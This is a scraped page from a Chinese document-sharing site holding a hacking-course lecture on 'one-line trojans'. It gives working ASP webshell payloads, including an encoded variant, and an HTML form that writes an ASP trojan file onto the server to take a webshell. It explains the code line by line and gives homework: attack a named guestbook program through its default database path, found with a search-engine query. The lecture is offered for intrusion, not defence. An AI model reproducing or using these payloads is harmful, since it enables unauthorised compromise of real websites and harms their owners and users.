- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
黑侠工作室 vip入侵 第四讲:一句话木马的应用 学习目的 学会一句话木马的使用 了解一句话木马的代码内容及意义 学会利用一句话木马拿webshell 代码分析 form action=/ah.asp method=post ‘一个提交表单 textarea name=1 cols=120 rows=10 width=45 set lP=server.CreateObject(Adodb.Stream) lP.Open lP.Type=2 lP.CharSet=gb2312 lP.writetext request(p) lP.SaveToFile server.mappath(conn.asp),2 lP.Close set lP=nothing response.redirect conn.asp /textarea textarea name=p cols=120 rows=10 width=45这填马的代码/textareaBRcenterbr input type=submit value=提交 /form //程序的主要框架是formtextarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示textarea/textarea//添加木马内容用的/form 我们一句一句分析: form action=/ah.asp method=post //action=后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单 以post方式提交给连接/ah.asp处理 textarea name=value cols=120 rows=10 width=45 //这里的value值根据服务端%execute request(value)%中value而设定//可以自行修改成%execute request(p)%相应这里的value值也必须改为pset lP=server.createObject(Adodb.Stream)//建立流对象,有了对象才可以使用它固有的属性和方法 lP.Open //打开lP.Type=2 //以文本方式lP.CharSet=gb2312 //字体标准lP.writetext request(joeving) //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应lP.SaveToFile server.mappath(wei.asp),2 //将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp//但和下面的response.redirectwei.asp中wei.asp的保持一致lP.Close //关闭对象set lP=nothing //释放对象response.redirect wei.asp //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面/textarea//这段程序的功能:利用插入到数据库文件的%execute request(value)%这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了 textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr//这段标签是你用来添加木马内容用的 input type=submit value=提交/form 一句话木马的形式 %execute request(1)% 这句是服务端,配合客户端使用 %On Error Resume Next%%execute request(huan)% % if request(huan) then execute request(huan) % %3C%25execute%20request(%22a%22)%25%3E 还有很多我就不一一介绍了 自己在入侵中测试吧 实践漏洞 为了更容易理解,我找了个简单的留言本,修改出来漏洞,来为大家演示 课后作业 测试程序:音乐听吧 代码下载:/soft/3919.htm 代码缺陷:默认留言数据库为asp并且没做防下载处理 默认数据库地址:/gbook/zpinfo_music_guest.asp 搜索引擎搜索:本站所有MP3只链接收集自网上,其版权属歌手本人或其所属唱片公司所有,用户请在下载后的23小时内删除MP3歌曲,请购买正版C
文档评论(0)